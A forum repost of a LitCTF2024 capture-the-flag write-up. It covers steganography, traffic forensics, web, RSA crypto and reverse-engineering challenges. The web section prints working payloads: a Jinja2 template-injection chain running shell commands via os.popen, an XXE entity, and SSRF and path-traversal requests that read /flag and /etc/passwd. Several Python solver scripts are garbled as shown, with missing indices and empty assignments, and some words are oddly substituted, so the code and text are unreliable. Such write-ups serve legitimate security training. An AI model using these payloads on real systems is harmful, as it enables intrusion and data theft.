论坛 › 网络安全 › LitCTF2024-ZongRan战队WriteUp

科技颠覆者 发表于 2024-6-2 18:00:18

LitCTF2024-ZongRan战队WriteUp

ZongRan战队WriteUp

Web+Misc：Muneyoshi
Crypto：chacha
Reverse：laonazaixiuxing
Misc

涐贪恋和伱、甾―⑺dé毎兮毎秒

解题思路：lsb隐写,直接提取
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185738633-866854850.png
LitCTF{e8f7b267-9c45-4c0e-9d1e-13fc5bcb9bd6}你说得对，但__

一张二维码扫描一下
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185738092-1242953200.png
发现不对，发现这是原神网页
binwalk提取一下
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185737074-359656084.png
然后是四张二维码的图，知心给了次序
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185736289-1992072463.png
然后拼接一下扫描
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185735773-1278310724.png
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185735212-1328772414.png
盯帧珍珠

题目也说了帧，所以应该gif，010看一下
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185734694-620324971.png
发现gif文件头，我们改一下后缀
随波逐流分帧
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185734149-240094653.png
得到flag
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185733445-1562177908.png
LitCTF{You_are_really_staring_at_frames!}原铁，启动！

https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185730789-342502933.png
第一部分原神
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185730118-996283031.png
第二部分铁道
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185728267-24267893.png
flag{good_gamer}关键，太关键了!

字频统计得到
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185727490-1181220109.png
bingo然后关键词密码解密CTF在线工具-在线关键字加密|在线关键字解密|关键字密码算法|Keyword Cipher (hiencode.com)
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185727064-2087093137.png
Everywhere We Go

audacity看一下波谱图(早上看了一遍，没放大没找到，哭死)
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185726430-2063458373.png
flag{Calculate_Step_By_Step}舔到最后应有尽有

看出来是base64，每一段都是，所以不能整个一起解密，其实是base64隐写
网上找到脚本跑[MISC]Base64隐写-CSDN博客
# base64隐写
import base64


def get_diff(s1, s2):
    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    res = 0
    for i in range(len(s2)):
      if s1 != s2:
            return abs(base64chars.index(s1) - base64chars.index(s2))
    return res


def b64_stego_decode():
    file = open("LOVE_LETTER.txt", "rb")
    x = ''# x即bin_str
    lines = file.readlines()
    for line in lines:
      l = str(line, encoding="utf-8")
      stego = l.replace('\n', '')
      # print(stego)
      realtext = base64.b64decode(l)
      # print(realtext)
      realtext = str(base64.b64encode(realtext), encoding="utf-8")
      # print(realtext)
      diff = get_diff(stego, realtext)# diff为隐写字串与实际字串的二进制差值
      n = stego.count('=')
      if diff:
            x += bin(diff).zfill(n * 2)
      else:
            x += '0' * n * 2

    i = 0
    flag = ''
    while i < len(x):
      if int(x, 2):
            flag += chr(int(x, 2))
      i += 8
    print(flag)


if __name__ == '__main__':
    b64_stego_decode()https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185724308-961832025.png
The love（随后补的）

010editor打开图片，发现了一个压缩包，以及雷同密码的东西
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185723721-1239623694.png
binwalk分离一下这个图片，提取出来一个压缩包，然后archpr去对压缩包掩码攻击
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185722801-1835862992.png
解压一下，得到一个pasword文本以及假的flag文本
然后对password里面的两次base64解密得到一个密码
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185722072-37124141.png
我们还有个音频，因为wav文件，然后试试deepsound隐写
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185721653-1552946944.png
找到真正的flag
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185721070-1547378129.png
女装照流量（随后补的）

在流量包追踪流，在tcp流28，里面找到一个压缩包一样的东西
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185720583-1142764206.png
我们用binwalk提取出来一个加密的压缩包
我们就是想办法找密码
在tcp流26里面找到https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185719784-307478156.png
然后我们对这个litcft这个话url解码一下，看看搞了个啥（这是之前上传的一句话木马的参数）
然后看这里取值是从第三位开始取值，所以我们base64解码应该从第三位开始
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185718551-1439094202.png
解出来一个这，就发现了这个压缩包的密码
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185717767-332759358.png
解压一下
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185717417-821500171.png
Web

SAS - Serializing Authentication System

一个反序列化，我们构造一下
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185716973-616676938.png
然后base64加密
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185716467-1247391067.png
然后粘贴进去就好了
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185715942-589047992.png
一个....池子？

这种输入什么，返回什么，一眼SSTI，输入
{{7*7}}https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185715563-675415127.png
又输入
{{7*'7'}}https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185715076-746314324.png
确定是Jinja2
{{''.__class__.__mro__.__subclasses__()}}脚本看看os模块在哪，即os._wrap_close（此处我是复制到了浏览器回显的内容，建了一个文本）
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185714581-936259498.png
开始找全局类
{{''.__class__.__mro__.__subclasses__().__init__.__globals__['__builtins__']}}https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185713840-289422893.png
开始找import这个类，之后就使用这个类去进行命令执行
{{''.__class__.__mro__.__subclasses__().__init__.__globals__['__builtins__']['__import__']('os').popen('ls /').read()}}https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185711958-16842380.png
读取flag
{{''.__class__.__mro__.__subclasses__().__init__.__globals__['__builtins__']['__import__']('os').popen('cat /flag').read()}}https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185711270-1314264161.png
exx

这道题也是很熟悉，前几天正好好做到了，在Fake XML cookbook做过
而且题目就是xxe
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185710634-1789152926.png
然后xxe注入
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hack [
<!ENTITY xxe SYSTEM "file:///flag">]>
<user><username>&xxe;</username><password>123</password></user>https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185709979-501332398.png
浏览器也能套娃？

先试了试百度的，可以访问，应该是ssrf
然后利用file协议
file:///etc/passwd的确返回了
然后直接检察flag
file:///flaghttps://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185709517-797326145.png
高亮主题(划掉)配景检察器

开始以为文件包含，实际目次遍历,也暗示了让你点击选择主题
抓包发现
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185709073-1000250049.png
然后我尝试了
theme=../flag.php发现路径回显了
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185708570-296558826.png
然后应该就是目次遍历,先找根目次，所以就是试，最后如许
theme=../../../../etc/passwdhttps://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185708073-1061247088.png
然后检察flag
theme=../../../../flaghttps://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185707334-505508235.png
Crypto

common_primes

共享素数

给了一个e，和多组的n，c。这些n,c还都是一个明文m通过对差别的n进行gcd()算法，求出最大公约数（即p）
求出p了，就能求出q，进而求出d， 解出明文m
from Crypto.Util.number import *
import gmpy2

n1 = 63306931765261881888912008095340470978772999620205174857271016152744820165330787864800482852578992473814976781143226630412780924144266471891939661312715157811674817013479316983665960087664430205713509995750877665395721635625035356901765881750073584848176491668327836527294900831898083545883834181689919776769
n2 = 73890412251808619164803968217212494551414786402702497903464017254263780569629065810640215252722102084753519255771619560056118922616964068426636691565703046691711267156442562144139650728482437040380743352597966331370286795249123105338283013032779352474246753386108510685224781299865560425114568893879804036573
c1 = 11273036722994861938281568979042367628277071611591846129102291159440871997302324919023708593105900105417528793646809809850626919594099479505740175853342947734943586940152981298688146019253712344529086852083823837309492466840942593843720630113494974454498664328412122979195932862028821524725158358036734514252
c2 = 42478690444030101869094906005321968598060849172551382502632480617775125215522908666432583017311390935937075283150967678500354031213909256982757457592610576392121713817693171520657833496635639026791597219755461854281419207606460025156812307819350960182028395013278964809309982264879773316952047848608898562420

p = gmpy2.gcd(n1, n2)
if p == 1:
    exit("n1和n2没有不为1的最大公因子")
q1 = n1 // p
q2 = n2 // p

phi_n1 = (p - 1) * (q1 - 1)
phi_n2 = (p - 1) * (q2 - 1)
e = 65537
d1 = gmpy2.invert(e, phi_n1)
m1 = pow(c1, d1, n1)
print(long_to_bytes(m1))https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185706812-1576707124.png
small_e

小明文攻击

适用情况：e较小，一般为3。 公钥e很小，明文m也不大的话，于是 m^e = k*n + c 中的的k值较小 。从 0 开始穷举k，对每一次 k\*n + c 开e次方，直到得到整数结果，整数结果即为明文
思路：

[*]遍历c_list中的每个元素c。
[*]对每个c，计算其立方根（c ** (1/3)）。
[*]使用round()函数将立方根的结果四舍五入到最接近的整数。
[*]使用chr()函数将四舍五入后的整数转换为对应的ASCII字符。
[*]使用列表推导将上述过程应用于c_list中的每个元素，生成一个新的字符列表。
[*]使用join()方法将字符列表中的字符连接成一个字符串，并用空字符串''作为连接符。
[*]将最终得到的字符串赋值给变量flag。
from Crypto.Util.number import *

'''
n = 19041138093915757361446596917618836424321232810490087445558083446664894622882726613154205435993358657711781275735559409274819618824173042980556986038895407758062549819608054613307399838408867855623647751322414190174111523595370113664729594420259754806834656490417292174994337683676504327493103018506242963063671315605427867054873507720342850038307517016687659435974562024973531717274759193577450556292821410388268243304996720337394829726453680432751092955575512372582624694709289019402908986429709116441544332327738968785428501665254894444651547623008530708343210644814773933974042816703834571427534684321229977525229
c_list =
'''

e=3
c_list =
# 解密
flag = ''.join()
print(flag)https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185706239-607113727.png
CRT

典型的中国剩余定理

设[https://www.cnblogs.com/litctf.assets/10b41471778d5a1c10a6fb0a564a8c483df606e2.svg](javascript:)是整数m1, m2, ... , mn的乘积，并设[https://www.cnblogs.com/litctf.assets/39b20c626ec6b04a3cbd13c524172c3638371f74.svg](javascript:)，即[https://www.cnblogs.com/litctf.assets/eda8fd06f1cd5de22ed07385a0f8aa19773b2de9.svg](javascript:)是除了mi以外的n − 1个整数的乘积。
设[https://www.cnblogs.com/litctf.assets/bd32f7173a32d940eb3f995e732359ccd741ffba.svg](javascript:)为[https://www.cnblogs.com/litctf.assets/eda8fd06f1cd5de22ed07385a0f8aa19773b2de9.svg](javascript:)模[https://www.cnblogs.com/litctf.assets/95ec8e804f69706d3f5ad235f4f983220c8df7c2.svg](javascript:)的数论倒数：[https://www.cnblogs.com/litctf.assets/e764e813b4b993880932c6b080b56f3aa2b9ea59.svg](javascript:)
方程组的通解情势为：[https://www.cnblogs.com/litctf.assets/105e4e1aa217620e7ebfa31a2c894845dd2ca1df.svg](javascript:) 在模[https://www.cnblogs.com/litctf.assets/f82cade9898ced02fdd08712e5f0c0151758a0dd.svg](javascript:)的意义下，方程组[https://www.cnblogs.com/litctf.assets/e7fcd27e8d01fdf5fe00da4f97045f079cd97bff.svg](javascript:)只有一个解：[https://www.cnblogs.com/litctf.assets/56e89d12fd609dc39d5c6919c2d9c47252dbf829.svg](javascript:)
from gmpy2 import *
from Crypto.Util.number import *

n_list =
c_list =


def crt(n_list, c_list):
    n = 1
    for i in n_list:
      n *= i
    N = []#Mi
    for i in n_list:
      N.append(n // i)   #追加到列尾
    t = []#ti
    for i in range(len(n_list)):
      t.append(invert(N, n_list))   #求逆元

    sum = 0
    for i in range(len(n_list)):
      sum = (sum + c_list * t * N) % n
# c_list即为通解中的a
    return sum

e = 10
M = crt(n_list, c_list)
m = iroot(M, e)
flag = long_to_bytes(m)
print(flag)https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185705842-337754878.png
Polynomial

解方程+多因子

解方程求出p,q,r
φ(n)=φ(p)φ(q)φ(r)=(p−1)(q−1)(r−1)
from Crypto.Util.number import *
import sympy as sp
import gmpy2


p,q,r=sp.symbols('p q r')

Polynomial1 = 58154360680755769340954893572401748667033313354117942223258370092578635555451803701875246040822675770820625484823955325325376503299610647282074512182673844099014723538935840345806279326671621834884174315042653272845859393720044076731894387316020043030549656441366838837625687203481896972821231596403741150142
Polynomial2 = 171692903673150731426296312524549271861303258108708311216496913475394189393793697817800098242049692305164782587880637516028827647505093628717337292578359337044168928317124830023051015272429945829345733688929892412065424786481363731277240073380880692592385413767327833405744609781605297684139130460468105300760
Polynomial3 = 97986346322515909710602796387982657630408165005623501811821116195049269186902123564611531712164389221482586560334051304898550068155631792198375385506099765648724724155022839470830188199666501947166597094066238209936082936786792764398576045555400742489416583987159603174056183635543796238419852007348207068832
c = 690029769225186609779381701643778761457138553080920444396078012690121613426213828722870549564971078807093600149349998980667982840018011505754141625901220546541212773327617562979660059608220851878701195162259632365509731746682263484332327620436394912873346114451271145412882158989824703847237437871480757404551113620810392782422053869083938928788602100916785471462523020232714027448069442708638323048761035121752395570167604059421559260760645061567883338223699900

eq1= p**2 + q-Polynomial1
eq2= q**2 + r-Polynomial2
eq3= r**2 + p-Polynomial3

sol = sp.solve((eq1 , eq2,eq3), (p, q, r))
# print(sol)

p=7625900647186256736313352208336189136024613525845451962194744676052072325262646533642163553090015734584960267587813894745414843037111074258730819958397631
q=13103163880267648221851617296336865295731278851373488569182099549824826973560296247802058712197255433671825570972129891122274435889696663320490806634737981
r=9898805297737495640281149403465681435952383402115255751446422784763742395898034378399391604085137196351802539935697155137226495010184322468562791581344399
e = 65537
n = p * q * r
d = gmpy2.invert(e, (p - 1) * (q - 1) * (r-1))
m = pow(c, d, n)
print(long_to_bytes(m))https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185705472-1091930814.png
真·EasyRSA

欧拉函数

n=p^4
φ(n)=p4-p3
from Crypto.Util.number import *
import gmpy2
'''
p=getPrime(256)
print(p)
n=p**4
m=bytes_to_long(flag)
e=65537
c=pow(m,e,n)
print(c)
'''

c1= 78995097464505692833175221336110444691706720784642201874318792576886638370795877665241433503242322048462220941850261103929220636367258375223629313880314757819288233877871049903331061261182932603536690216472460424869498053787147893179733302705430645181983825884645791816106080546937178721898460776392249707560
c2= 3784701757181065428915597927276042180461070890549646164035543821266506371502690247347168340234933318004928718562990468281285421981157783991138077081303219
n = 111880903302112599361822243412777826052651261464069603671228695119729911614927471127031113870129416452329155262786735889603893196627646342615137280714187446627292465966881136599942375394018828846001863354234047074224843640145067337664994314496776439054625605421747689126816804916163793264559188427704647589521
c=93492332457019255141294502555555489582661562346262162342211605562996217352449
n1=93492332457019255141294502555555489582661562346262162342211605562996217352449
p = gmpy2.iroot(n,4)
print(p)
e = 65537
phi = p**4-p**3

d = gmpy2.invert(e,phi)
m1 = pow(c1,d,n)

print(long_to_bytes(m1))运行得到hint
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185705030-717792312.png
对比p和hint的位数发现只差一位，猜测hint为p,用c2，n，e，p，q进行正常RSA
from Crypto.Util.number import *
import gmpy2

c2= 3784701757181065428915597927276042180461070890549646164035543821266506371502690247347168340234933318004928718562990468281285421981157783991138077081303219
c=93492332457019255141294502555555489582661562346262162342211605562996217352449
n1=93492332457019255141294502555555489582661562346262162342211605562996217352449
p = 102846375519753428570573823986925744957687092615041080268232889119455234034483
q = 93492332457019255141294502555555489582661562346262162342211605562996217352449
e = 65537
phi = (p-1)*(q-1)
n= q * p
d = gmpy2.invert(e,phi)
m1 = pow(c2,d,n)

print(long_to_bytes(m1))https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185704564-1346161252.png
little_fermat

费马分解

p，q是两个素数，而且他俩在素数序列里面就是一前一后的关系。所以他俩的乘积开根号得到的结果一定是在p，q之间的一个数字，（而且一定不是素数，因为p，q就是紧邻的两个素数）。
那我们找这个开方出来的数字的下一个素数，一定是q，因此我们再让n/q就可以得到两个素数。
from Crypto.Util.number import *
from sympy import *
from gmpy2 import *
'''
m = bytes_to_long(flag)
e = 65537
p = getPrime(512)
q = nextprime(p)
n = p * q

x = gen_x(p)

assert pow(666666, x, p) == 1

m = m ^ x
c = pow(m, e, n)

print(f'n = {n}')
print(f'c = {c}')
'''
e = 65537
n = 122719648746679660211272134136414102389555796575857405114496972248651220892565781331814993584484991300852578490929023084395318478514528533234617759712503439058334479192297581245539902950267201362675602085964421659147977335779128546965068649265419736053467523009673037723382969371523663674759921589944204926693
c = 109215817118156917306151535199288935588358410885541150319309172366532983941498151858496142368333375769194040807735053625645757204569614999883828047720427480384683375435683833780686557341909400842874816853528007258975117265789241663068590445878241153205106444357554372566670436865722966668420239234530554168928
sn=isqrt(n)
q=next_prime(sn)
p=n//q
phi=(p-1)*(q-1)
d=invert(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m^p))Reverse

编码喵

用IDA打开
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185704123-1600785742.jpg
输入的字符串颠末 LitCTF_tanji_calculate::Encode((__int64)v16, v21, v12, v11);加密后与"tgL0q1rgEZaZmdm0zwq4lweYzgeTngfHnI1ImMm5ltaXywnLowuYnJmWmx0="进行比较。
进入 LitCTF_tanji_calculate::Encode((__int64)v16, v21, v12, v11);分析应该是base64编码，看看a2也就是编码序列是什么
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185703620-1978643263.jpg
a2=v21=v11=”abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/”
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185703006-238430904.jpg
到这里，就是自界说的base64解密，直接用工具解密，得出flag
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240602185702523-729896810.gif

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

查看完整版本: LitCTF2024-ZongRan战队WriteUp